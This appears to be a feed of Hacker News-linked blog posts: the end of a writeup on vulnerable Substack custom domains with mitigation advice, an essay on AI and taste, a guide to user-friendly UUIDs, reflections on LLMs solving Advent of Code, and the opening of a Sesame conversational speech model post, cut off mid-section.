    Discussion

    Using to DNS databases (such as SecurityTrails) I found 16925 custom domains (i.e. domains that have a CNAME pointing to target.substack-custom-domains.com). Of these, 1426 are not actually connected to a Substack blog, and as such, vulnerable to domain takeover. More than 8% vulnerable is a significant portion. Of these 1426 domains, 11 domains are wildcard domains.

    This is not a vulnerability in Substack, as Substack does not own or manage these domains. However, Substack could solve this problem forever by requiring customers to authenticate the domains they own (Cloudflare for SaaS support this). This would require a bit more configuration on the customers side, but would ultimately mean that domain takeover attacks are not possible anymore.

    However, Substack has another measure in place that will prevent some domain takeover attacks: the $50 fee to enable custom domains on a blog. $50 will not stop a motivated attacker, but it will prevent an attacker from taking over a domain just for fun. It is unclear whether Substack deliberately implemented the $50 fee as some sort of behavioral security measure, but it does have that effect.

    Mitigation

    If a domain has a CNAME record pointing to target.substack-custom-domains.com, either add it to a blog or remove the CNAME record. And never point a wildcard domain to target.substack-custom-domains.com.


    ]]>
    https://blog.nietaanraken.nl/posts/substack-domain-takeover/ hacker-news-small-sites-43229233 Sun, 02 Mar 2025 11:00:42 GMT
    <![CDATA[The Cup of Coffee Theory of AI]]> thread link) | @sebg
    March 2, 2025 | https://billyoppenheimer.com/the-cup-of-coffee-theory/ | archive.org

    This piece originally ran on Every.

    As the author Ryan Holiday’s research assistant, I’m worried about AI replacing me. 

    By most of the common psychological tests of intelligence, AI is smarter than me. AI can brainstorm more ideas than I can. AI can read a book, find information, fact check, and create content faster than I can.

    So I’ve considered going back to working in coffee shops.

    After I graduated from college, I chased winter. I lived and skied all over Colorado for the Northern Hemisphere’s winter months, and for the southern hemisphere’s, Australia and New Zealand.

    To fund this year-round skiing, wherever I went, I worked part-time as a barista. When I think about my time working in coffee shops around the world, I find reasons to be optimistic about my job security.

    Coffee shops around the world all have the same powerful machines. They’ve science’d most parts of the process—how the beans are grown, the mineral composition of the water, the milks and the drinkware. So, unlike not that long ago, you can get a great latte, cappuccino, or flat white basically anywhere. 

    Yet many people still love their drip coffee with half and half. Many love their cheap store-bought beans brewed by their countertop coffee pot. And many don’t care—they just want their shot of caffeine.

    Coffee preferences are personal and abundant. The world is big enough for espresso machines and French presses. And which machine the barista uses depends on who they’re serving. 

    Art preferences are similar. So when I hear talk about how AI is going to replace artists, I think to myself, the world is big enough for both. Or when I see tweets about how AI wrote this “great” article or produced this “great” image, I ask myself, “great”—according to whom?

    Countless authors, painters, and inventors who were considered ordinary in their own time are revered in ours. And anyone who has made and released creative work has experienced something analogous to making a delicious espresso for an audience that prefers a French press.

    This is the perennial challenge of the artist: finding the middle of the Venn diagram where one circle is the artist’s tastes and the other is the audience’s tastes. 

    For the past two years, we’ve tried to hire another research assistant. We’ve trialed dozens of smart, creative, ambitious, book-loving, speedy fact-checking individuals. We always give them a version of the same assignment: read this book (usually a biography) and pull out two good anecdotes and two good quotes. What they come back with is not in the middle of that Venn diagram. 

    In a word, we’ve struggled for two years to find someone with taste—with an eye for what stands the chance of being interesting, entertaining, or useful to an audience. 

    We’re not alone. I’ve talked to authors, podcasters, documentarians, late-night TV writers, YouTubers and TikTokers, and they all share this problem. Most of these creators are actively or passively looking for people—whether researchers, writers, animators, video editors, producers, or production managers—with what Jerry Seinfeld identified as the ultimate skill of the artist: “taste and discernment.”  

    “It’s one thing to create,” Seinfeld said. “The other is you have to choose. ‘What are we going to do, and what are we not going to do?’ This is a gigantic aspect of [artistic] survival. It’s kind of unseen—what’s picked and what is discarded—but mastering that is how you stay alive.”

    Tools like ChatGPT are great at creating. AI can generate options in high quantities at high speed. It is great at providing more choices. But it is not great at discerning and choosing what to do and what not to do. For example, I prompted ChatGPT:

    The results are the worst we’ve seen. First, none of the quotes are relevant to the article I said I wanted to write. Second, none of the quote sources are correct. And third, none of the quotes are actual Marcus Aurelius quotes, let alone from the Gregory Hays translation (Ryan’s favorite, and the one from which we source for the Daily Stoic).   

    The tools will no doubt get better at pulling relevant quotes. But I’m less confident they’ll ever solve the perennial mysteries of taste and discernment. Many great artists have put out what they thought was their best work, only to see it flop. And vice versa—what they thought was average ended up going viral. Every time you release a work of art into the world, you can’t forecast its reception with any certainty. The best you can do is have a vague sense that others might like it. You (or the AI bot, or a hybrid of the two) are always guessing.

    But if anyone is in a better position to make better guesses, I do think it’s humans. 

    When a work of art—whether a book or an album, a movie, a TV show, or a YouTube video—is well received, we say that it connected. The work connected with an audience—with humans. 

    To connect with humans, it helps to be among humans. Leonardo da Vinci kept a notebook hanging from his belt loop and, one of his contemporaries would recall, “went to places where he knew that people assembled and observed their faces, their manners, dresses, and gestures.” The filmmaker David Mamet used to ride the bus around Chicago, take notes of the things people said, and then go home and write dialogue. J.K. Rowling had the initial idea for Harry Potter on a Manchester-London train, wrote a lot of the series in cafes, and named some characters after childhood friends and based others on favorite teachers. 

    Artists who get so famous that they can’t go out in public talk about how not being able to do so makes it hard to create art that connects. To come up with material for Seinfeld, for instance, Seinfeld and co-creator Larry David liked to hang out in public settings where they could observe and eavesdrop on strangers. As the show became a cultural phenomenon, Seinfeld and David couldn’t go out in public like they used to. Strangers didn’t act like strangers around them. This slow detachment from humanity made it harder to make a show that connected with humanity. 

    When you don’t experience reality like most people do, it’s hard to make things that connect with most people. 

    AI, completely detached from reality, will have a hard time making things that connect with people. It’s something of a hybrid between the Harvard grad student in the movie Good Will Hunting, who can regurgitate page 98 of Daniel Vickers’s Work in Essex County but can’t come up with any thoughts of his own, and Will Hunting, who can give you the skinny on Michelangelo—life’s work, political aspirations, his relationship with the pope, sexual orientation—but can’t tell you what it’s like to stand in the Sistine Chapel and look up at that beautiful ceiling.

    AI is smart. Ask it about books, and it can spit out a top-100 list. But it can’t tell you what it’s like to read a passage that puts perfectly something you’ve felt but couldn’t articulate. Ask it about music, and it can write you lyrics in the style of whoever you’d like. But it’s never listened to a great song, never heard one right when it needed to be heard. Ask it about taking a walk, and it can give you science-backed reasons to go for one. But it’s never been on a walk, never been totally excited by a thought or an idea that seemed to come from out of nowhere. Ask it about coffee, and it can give you an infographic that details tens or hundreds of brewing methods. But it’s never had that first sip of that first cup of the day. Ask it about connecting with an audience, and it can give you hundreds of best practices. But it can’t guarantee any of them are going to work. 

    It can’t be certain that your work (or its own) will connect with the human experience. It can’t be certain that the work will land in the middle of that Venn diagram. It can’t be certain that its taste and discernment are “great.”

    This remains the perennial problem of making great art. 

    If AI solves it, well, I can teach you how to work an espresso machine.

    ]]>
    https://billyoppenheimer.com/the-cup-of-coffee-theory/ hacker-news-small-sites-43229170 Sun, 02 Mar 2025 10:44:55 GMT
    <![CDATA[The UX of UUIDs]]> thread link) | @nomilk
    March 2, 2025 | https://www.unkey.com/blog/uuid-ux | archive.org

    TLDR: Please don't do this:

    https://company.com/resource/c6b10dd3-1dcf-416c-8ed8-ae561807fcaf

    The baseline: Ensuring global uniqueness

    Unique identifiers are essential for distinguishing individual entities within a system. They provide a reliable way to ensure that each item, user, or piece of data has a unique identity. By maintaining uniqueness, applications can effectively manage and organize information, enabling efficient operations and facilitating data integrity.

    Let’s not pretend like we are Google or AWS who have special needs around this. Any securely generated UUID with 128 bits is more than enough for us. There are lots of libraries that generate one, or you could fall back to the standard library of your language of choice. In this blog, I'll be using Typescript examples, but the underlying ideas apply to any language.

    const id = crypto.randomUUID();
    // '5727a4a4-9bba-41ae-b7fe-e69cf60bb0ab'

    Stopping here is an option, but let's take the opportunity to enhance the user experience with small yet effective iterative changes:

    1. Make them easy to copy
    2. Prefixing
    3. More efficient encoding
    4. Changing the length

    Copying UUIDs is annoying

    Try copying this UUID by double-clicking on it:

    c6b10dd3-1dcf-416c-8ed8-ae561807fcaf

    If you're lucky, you got the entire UUID but for most people, they got a single section. One way to enhance the usability of unique identifiers is by making them easily copyable. This can be achieved by removing the hyphens from the UUIDs, allowing users to simply double-click on the identifier to copy it. By eliminating the need for manual selection and copy-pasting, this small change can greatly improve the user experience when working with identifiers.

    Removing the hyphens is probably trivial in all languages, here’s how you can do it in js/ts:

    const id = crypto.randomUUID().replace(/-/g, "");
    // fe4723eab07f408384a2c0f051696083

    Try copying it now, it’s much nicer!

    Prefixing

    Have you ever accidentally used a production API key in a development environment? I have, and it’s not fun. We can help the user differentiate between different environments or resources within the system by adding a meaningful prefix. For example, Stripe uses prefixes like sk_live_ for production environment secret keys or cus_ for customer identifiers. By incorporating such prefixes, we can ensure clarity and reduce the chances of confusion, especially in complex systems where multiple environments coexist.

    const id = `hello_${crypto.randomUUID().replace(/-/g, "")}`;
    // hello_1559debea64142f3b2d29f8b0f126041

    Naming prefixes is an art just like naming variables. You want to be descriptive but be as short as possible. I'll share ours further down.

    Encoding in base58

    Instead of using a hexadecimal representation for identifiers, we can also consider encoding them more efficiently, such as base58. Base58 encoding uses a larger character set and avoids ambiguous characters, such as upper case I and lower case l resulting in shorter identifier strings without compromising readability.

    As an example, an 8-character long base58 string, can store roughly 30.000 times as many states as an 8-char hex string. And at 16 chars, the base58 string can store 889.054.070 as many combinations.

    You can probably still do this with the standard library of your language but you could also use a library like nanoid which is available for most languages.

    import { customAlphabet } from "nanoid";
    export const nanoid = customAlphabet(
      "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz",
    );
    
    const id = `prefix_${nanoid(22)}`;
    // prefix_KSPKGySWPqJWWWa37RqGaX

    We generated a 22 character long ID here, which can encode ~100x as many states as a UUID while being 10 characters shorter.

    CharactersLengthTotal States
    UUID16322^122 = 5.3e+36
    Base58582258^22 = 6.2e+38

    The more states, the higher your collision resistance is because it takes more generations to generate the same ID twice (on average and if your algorithm is truly random)

    Changing the entropy

    Not all identifiers need to have a high level of collision resistance. In some cases, shorter identifiers can be sufficient, depending on the specific requirements of the application. By reducing the entropy of the identifiers, we can generate shorter IDs while still maintaining an acceptable level of uniqueness.

    Reducing the length of your IDs can be nice, but you need to be careful and ensure your system is protected against ID collissions. Fortunately, this is pretty easy to do in your database layer. In our MySQL database we use IDs mostly as primary key and the database protects us from collisions. In case an ID exists already, we just generate a new one and try again. If our collision rate would go up significantly, we could simply increase the length of all future IDs and we’d be fine.

    LengthExampleTotal States
    nanoid(8)re6ZkUUV1.3e+14
    nanoid(12)pfpPYdZGbZvw1.4e+21
    nanoid(16)sFDUZScHfZTfkLwk1.6e+28
    nanoid(24)u7vzXJL9cGqUeabGPAZ5XUJ62.1e+42
    nanoid(32)qkvPDeH6JyAsRhaZ3X4ZLDPSLFP7MnJz2.7e+56

    Conclusion

    By implementing these improvements, we can enhance the usability and efficiency of unique identifiers in our applications. This will provide a better experience for both users and developers, as they interact with and manage various entities within the system. Whether it's copying identifiers with ease, differentiating between different environments, or achieving shorter and more readable identifier strings, these strategies can contribute to a more user-friendly and robust identification system.

    IDs and keys at Unkey

    Lastly, I'd like to share our implementation here and how we use it in our codebase. We use a simple function that takes a typed prefix and then generates the ID for us. This way we can ensure that we always use the same prefix for the same type of ID. This is especially useful when you have multiple types of IDs in your system.

    import { customAlphabet } from "nanoid";
    export const nanoid = customAlphabet(
      "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz",
    );
    
    const prefixes = {
      key: "key",
      api: "api",
      policy: "pol",
      request: "req",
      workspace: "ws",
      keyAuth: "key_auth", // <-- this is internal and does not need to be short or pretty
      vercelBinding: "vb",
      test: "test", // <-- for tests only
    } as const;
    
    export function newId(prefix: keyof typeof prefixes): string {
      return [prefixes[prefix], nanoid(16)].join("_");
    }

    And when we use it in our codebase, we can ensure that we always use the correct prefix for the correct type of id.

    import { newId } from "@unkey/id";
    
    const id = newId("workspace");
    // ws_dYuyGV3qMKvebjML
    
    const id = newId("keyy");
    // invalid because `keyy` is not a valid prefix name

    I've been mostly talking about identifiers here, but an api key really is just an identifier too. It's just a special kind of identifier that is used to authenticate requests. We use the same strategies for our api keys as we do for our identifiers. You can add a prefix to let your users know what kind of key they are looking at and you can specify the length of the key within reason. Colissions for API keys are much more serious than ids, so we enforce secure limits.

    It's quite common to prefix your API keys with something that identifies your company. For example Resend are using re_ and OpenStatus are using os_ prefixes. This allows your users to quickly identify the key and know what it's used for.

    const key = await unkey.key.create({
      apiId: "api_dzeBEZDwJ18WyD7b",
      prefix: "blog",
      byteLength: 16,
      // ... omitted for brevity
    });
    
    // Created key:
    // blog_cLsvCvmY35kCfchi
    ]]>
    https://www.unkey.com/blog/uuid-ux hacker-news-small-sites-43228860 Sun, 02 Mar 2025 09:39:35 GMT
    <![CDATA[What Challenge 13 thought me about LLMs]]> thread link) | @keithrozario
    March 2, 2025 | https://www.keithrozario.com/2025/03/what-challenge-13-thought-me-about-llms.html | archive.org

    While doing programming challenges in Advent of Code, I came across an interesting behavior of LLMs in coding assistants and decided to write about it to clear my thoughts.

    First some background.

    Advent of Code is a series of daily coding challenges released during the season of advent (the period just before Christmas). Each challenge has 2 parts, and you must solve part 1 before the part 2 is revealed. Part 2 is harder than Part 1, and usually requires re-writes to solve. Sometimes quite extensive rewrites, and others they are small incremental steps.

    If you haven’t done these challenges before, I encourage you to try. None of them are easy (at least to me), but all of them solvable with enough elbow grease and time.

    That said, the challenges are still contrived. Firstly, the questions are much better written that what you’d see in a Jira ticket or requirements document,. They include a detailed description of what must be done, and sample inputs and outputs you can test. Secondly, the challenges extend beyond what most coders do on a daily basis, one challenge required writing a small program to ‘defrag’ a disk, another required building a tiny assembler that ran it’s own program, and multiple questions involved you navigating a 2D maze with obstacles along the way. All fun things you will probably not do as a programmer in the real world.

    I took on the challenges, both to improve my coding skills, and to learn how I could use coding assistants like in these close to real-world scenarios. The hope was I would gain some insight into how I could use these tools more effectively should I need to do something more than solving contrived programming challenges before Christmas.

    OK. Background complete.

    Let’s move onto the challenge that changed the way I would look at LLMs forever.

    There are 25 challenges in total, each consisting of 2 parts. Here is a summarized version of the first part of Challenge number 13:

    • A resort has an arcade with claw machines.
    • Each machine has two buttons, A and B.
    • Button A costs 3 tokens, Button B costs 1 token.
    • Each button moves the claw a specific amount along the X and Y axes.
    • To win a prize, the claw must be positioned exactly above the prize on both axes.
    • Each button can be pressed a maximum of 100 times.
    • Find the minimum number of tokens for each machine required to win the prize

    And example scenario would be the following:

    Button A: X+94, Y+34
    Button B: X+22, Y+67
    Prize: X=8400, Y=5400

    Pause for a moment and try to construct your strategy for solving this puzzle. Keep the mind the solution will require to solve quite a few of these machines.

    Done? Ok, let’s proceed.

    This questions is especially beautiful because contains “hints” that are actually nefarious red herrings. But I don’t want to spoil the fun, so let’s go ahead and solve this.

    Because we know each button can only be pressed at most 100 times, hence there’s only 10,000 possible combinations per machine. This might sound like a lot, but my 6 year old macbook did this easily. We can construct a simple brute-force solution like this.

    We iterate 100 pushes of button A, with 100 pushes of button of B, and find any solution that would get the claw to the location we wanted. Next we calculate the number of tokens required for those solutions, and print out the smallest of those token counts as our final answer.

    Easy.

    But now let’s go part 2. Which has a twist that makes it more difficult … as always:

    • You realize there is a unit conversion error in the position of the prizes
    • They’re off by a factor of more 10 million
    • Now instead of just 100 presses for each button, each prize will require more than 100 Billion presses

    Nested for loops aren’t going to cut it here. Well they could, but you’d be looping through 10 sextillion (!!) iterations for each machine. I’m not a very good programmer, but even I know you should never consider nested loops for numbers that end with ‘illion’.

    Take a pause again, and think about how you might solve part 2.

    The solution is simple once you realize this is a linear algebra problem, and quite a simple one at that.

    We can see this on lines 9 and 10 of our initial solution. There are two equations with variables a_pushes and b_pushes, and since we have 2 variables and 2 linear equations, this is solvable. Personally I like the matrices approach, and Python conveniently has the numpy package, that solves this problem in one line.

    Much more performant.

    Much more elegant.

    Certainly better than the solution we wrote for in part 1.

    But …. why did we come up with such a slow solution for part 1 in the first place? I think it was the last 2 lines of the instructions:

    • Each button will be pressed a maximum of 100 times.
    • Find the minimum number of presses for each machine to win the prize

    The first is what I call a pink herring. It helps you in part 1, but sends you wildly off course for part 2. Yes, for part 1 it helped us solve by guiding down the nested for loops, but this was completely untenable for part 2. Had the question not included a maximum number of presses, we might have gone straight to linear algebra requiring no rewrite for part 2.

    The second is a particularly nasty red herring. This question only has 1 (and only 1!!) solution. There is no concept of minimum or maximum, because there is only ONE solution. Any code you wrote to choose a minimum from a list of possible solutions was completely and utterly unnecessary.

    And here is where we talk about the LLMs in coding assistants.

    First off, none of the LLMs in any of the assistants could solve this puzzle in one go (even just part 1). Some came close, requiring minimum tweaking to get it to work for part 1.

    Secondly ALL the LLMs used the nested for loop solution like me in their first iteration.

    ALL!

    Without exception!

    Sonnet, GPT-4o and Gemini Flash.

    That’s interesting, that the LLMs fall for the same tricks that humans do. But then again, the red herrings ‘prompt’ the LLMs down a certain path, so we shouldn’t be all that surprised.

    https://www.flickr.com/photos/jdhancock/4617759902

    If you grew up watching Star Trek like me, you know that Data, the Android on the Starship Enterprise is rational, emotionless, and super intelligent. Data wouldn’t be tricked by this. These red herrings are more likely to trick a robot like C3P0, a bewildering buffoon whose code you certainly wouldn’t trust.

    I’m not saying the LLMs are like C3PO — but they’re certainly not like Data.

    I prompted them again, to improve their code to make it faster:

    the solution is too slow, it times out because the real values, the number of presses can be in the millions. Is there a faster way to solve this?

    And voila, all of them, manage to identify that this is a Linear Algebra, and surprisingly all 3 had different takes on how to solve them. Each solution worked in the end (after some tweaking), and the problem was solved.

    But …. the LLMs still maintained the concept of minimum tokens. Either through the naming of the function/method. Or at least with one of them, it still checked for a minimum value. To me, this just means the LLMs never really ‘understand’ anything, even though they give off the impression of deep understanding.

    Any human who understood linear algebra, would remove all mentions of ‘minimum’ in their code once they understood the problem. There is no minimum here, we should not mention it to improve our code.

    The Code Assistants really did help me solve these questions faster — but I think we need to be cautious of what help to accept. If you don’t understand linear algebra, having the LLMs write out code that uses it would mean that you would be running code that neither you (nor the LLM) understood well. That’s a recipe for disaster.

    LLMs are susceptible to trickery just like humans — so how can we use them more effectively?

    System 1 and System 2

    A framework I thought was useful to understand comes from psychologist Daniel Kahneman. If Psychology was football, Kahneman would be standing amongst Pele, Maradona, Messi and Ronaldo.

    In his book, Thinking, Fast and Slow, he mentions two systems in our brain that act almost exclusively and independently. Which he bestowed the unfortunate names of System 1 and System 2 (reading too much Cat in the Hat?)

    System 1 is responsible for quick judgments and decisions based on patterns and experiences.  .  It’s responsible for automatic activities like detecting hostility in a voice, reading words on billboards, and driving a car on an empty road. 

    System 2 is slower, more deliberate, and more logical. It’s responsible for complex problem-solving and analytical tasks.  It’s responsible for seeking new or missing information, making decisions, and logical and skeptical thinking. 

    The best way to illustrate this is from the Baseball and Bat question. I’m sure you’ve seen this before:

    A baseball and bat together cost $1.10.

    The baseball cost $1 more than ball.

    How much does the ball cost?

    The immediate answer that jumps into your brain is 10 cents ($0.10). But that is the wrong answer. Upon learning this is the wrong answer, most folks can slowly figure out that the correct answer is indeed 5 cents ($0.05).

    The first answer of 10 cents, comes from System 1. It’s always on, ready to go, and barrels in with an answer instantly. Once you’re told this is wrong, your mind immediately kickstarts system 2, and system 2 may do a little algebra, or a quick calculation or two, and eventually end up with the correct answer of 5 cents. System 2 is not always on, it’s a finite resource with expensive computational requirements, it needs does some sanity checks on System 1 — and is only ever in full-drive mode when required.

    System 1 is easily fooled by red herrings, like find the minimum number of tokens in this problem with only one solution. System 2 is more deliberate and works of first principles — it’s the system that you start up whenever you tell yourself “let’s take a step back”.

    Are LLMs purely System 1 automatons?

    Well the question has been posed before, and initially (like in GPT3 days) the LLMs would fall for these tricks, but have since been improved. But have they improved to the point that actually are reasoning at a System 2 level?

    Or is it still just System 1 with guardrails that prevent them from making silly mistakes on very popular psychology questions? Are LLMs in coding assistants, purely system 1 automatons with hard-coded checks to make them look like System 2?

    All the models were able to correctly solve the linear algebra problem once prompted about the solution being slow. They correctly identified the problem, but only after being told to effectively ignore the ‘100 presses’ condition. They still thought there would be a minimum token count (the other red herring we never prompted them to ignore). So red herrings work, until you explicitly tell the model to avoid it.

    In other words, the model has no way to figure out if it were a red herring, unless the user explicitly tells it to. It doesn’t have a deep understanding of linear algebra — or even just a high school level understanding of it. It’s brain-dumping.

    There’s a brilliant talk by Terrence Tao, where he says this about the LLM models and how they help humans solve complex math’s problems that really resonated with me:

    …they’re not solving the problem from first principles, they’re just guessing at each step of the output what is the most natural thing to say next. The amazing thing is sometimes that works, but often it doesn’t

    Of course this talk was from GPT4 days, and perhaps things have changed, but I’m yet to see something that actually solves from first principles rather than trying to predict the next token. Just saying “explain your steps” isn’t fundamentally changing the way the model approaches the problem. The underlying model operation is still passing input through a large complex network of vector calculations and getting an output, just because there is ‘reasoning’ doesn’t necessarily mean there is understanding or building from first principles.

    After all, System 1 works in about the same way as an LLM — you don’t start every conversation with a plan of action on where you will conclude, you just blurt out the words, and by the time you say something, the next thing pops into your mind and you say that … ad infinitum, that’s System 1.

    System 2 is deliberate writing, you start with something, refine it over iterations, ensure the message is clear, and only then publish it out. So can we use an LLM something knowing that’s a sort of System 1 assistant?

    Challenge 23

    Challenge 23 helped me further clarify my thoughts. Part 1 of that challenge can be summarized as below:

    1. You’re given a network map of computer connections
    2. Each connection is represented as two computer names joined by a hyphen (e.g., kh-tc)
    3. Connections are undirected (order doesn’t matter)
    4. Task:
      • Find all sets of 3 computers that are fully connected to each other
      • Count how many of these sets contain a computer with a name starting with ‘t’

    I first attempted to solve this on my own, but with a twist. Recognizing that this was a Graph problem, I looked for popular Graph tools for Python (my programming language of choice). Initially I looked at CogDB, since it was the first search result that made sense. But I soon gave up, while it had promise, the project seemed to be somewhat abandoned.

    Adter searching a bit more, I stumbled across this Reddit Post, which suggested I use networkx. I did a little more digging and found rich documentation and a community around the package — so I used it.

    After finding networkx, I used the coding assistants to help me write code for it, and in barely 20 minutes, I had managed to solve the challenge. The main logic was solved in under 3 lines of code. Most of the time spent researching the problem and possible solutions — very little was spent actually coding.

    What happened next was even more impressive. When Part 2 rolled out, the question then asks to find the maximum size of a clique. This was one extra line to my code. Because I had used an external package that was purpose built over many years to solve Graph problems. What would sometimes take massive re-writes, or performance improvements was solved in just one extra line here.

    More importantly, I didn’t need the LLMs to generate large code blocks for me either, I was using code within a high quality package. There was little technical debt generated by this approach.

    If you asked the LLMs to solve the problem, they would all barrel down through System 1 and write nested for loops and massive if-else statements to solve it. Developers running on System 1 would do exactly the same thing — start writing code for a problem the instant you see it. The problem here is that even if it solves the problem, now you’ve got 100s of lines of code to maintain and test and validate — when an external battle-hardened opensource solution would have been far better.

    Good Great developers, read a problem, understand the requirements, research possible solutions before they even write that first line of code (unless it’s a space they’re extremely familar with). Chances are you’re not them, and just dumping this thing onto a LLM is definitely not the way to go.

    Engage your system 2, pose the problem, and suggest possible solutions like an external package that you’re confident will cover your use-case , and you’ll get a much better solution, that is not only more elegant but more maintainable.

    The human (at least for now) has to initiate the System 2 behavior. Think about how to solve the problem — perhaps even take your time, knowing the actual coding part (where System 1 takes over) can be substantially automated and accelerated.

    This is all new to me, but I’m now getting the hang of LLMs. I’m not a professional coder, but manage to solve most of the Advent of Code Challenge with help from the coding assistants. Without the assistants I would not have been able to do it — at least not in the same amount of time.

    However, I think the best coders will always be the ones who work from first principles. Who are able to decline what the LLM offers, and guide it down the ‘right’ path of code. Everybody else is going to ‘produce’ hundreds or even thousands of lines of code from an LLM, most of which wouldn’t make sense, and even if they work would be unreadable.

    I shudder at a world where code is rewritten over and over again, and maintained in a million different places.

    Conclusion

    Coding assistants are here to stay. At $20-$30 a month, it’s hard to find fault in them. Developers can cost anywhere from $300 – $3000 a day, the ROI for a coding assistant will be something in the order of 1 hour a month, or if you’re really expensive, perhaps even 15 minutes a month. This will certainly pay for itself and more immediately.

    However ….. this isn’t a case of free-ing up System 1 so developers can focus on System 2, because that’s not what will happen. There’s a reason System 2 isn’t always engaged, it’s expensive cognition, and a finite resource that has a max hours per day of usage. Just because you have time for System 2 doesn’t mean it can be engaged. But, if developers know that the final writing code part of the solution can be accelerated, they can spend more time engaging the design phase of a problem, confident they’ll hit deadlines with LLM by their side.

    So….

    Be careful how you use them. Blindly accepting what an LLM outputs out is a recipe for disaster, so too is dumping them a question and hoping for a good solution. The solution has to be coaxed out of the LLM with you as the human being the System 2 thinker.

    Sure, someone posted on LinkedIn about how the latest LLM manage to compile a binary that accomplished everything they wanted in a single shot — but there’s millions of people using these assistants. One of them is certain to have that one in a million response, and chances are high that they’ll post it online — do not expect that the one in a million response will be the norm instead of the exception.

    People only post exceptional things after all.

    To consistently use LLM effectively requires some fine-tuning of the user to understand what the limitations of these things are, and how we can avoid the pitfalls that come with them.

    ]]>
    https://www.keithrozario.com/2025/03/what-challenge-13-thought-me-about-llms.html hacker-news-small-sites-43228832 Sun, 02 Mar 2025 09:34:31 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @monroewalker
    March 1, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

